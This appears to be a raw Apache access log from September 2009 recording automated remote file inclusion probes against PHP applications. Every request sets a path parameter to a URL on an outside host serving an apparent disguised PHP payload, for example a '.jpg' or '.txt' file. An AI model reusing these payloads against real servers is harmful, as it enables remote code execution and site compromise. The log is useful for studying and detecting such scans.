61.100.186.87 - - [12/Sep/2009:05:05:48 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:05:05:48 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 200 17505 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:05:05:58 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.51.18.120 - - [12/Sep/2009:05:05:58 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.heartlandfencing.com/fence/templates/akoblueportal/css/echo? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
69.51.18.120 - - [12/Sep/2009:05:05:58 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.heartlandfencing.com/fence/templates/akoblueportal/css/echo? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
66.148.68.101 - - [12/Sep/2009:05:05:58 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:05:06:00 -0400] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:05:06:00 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
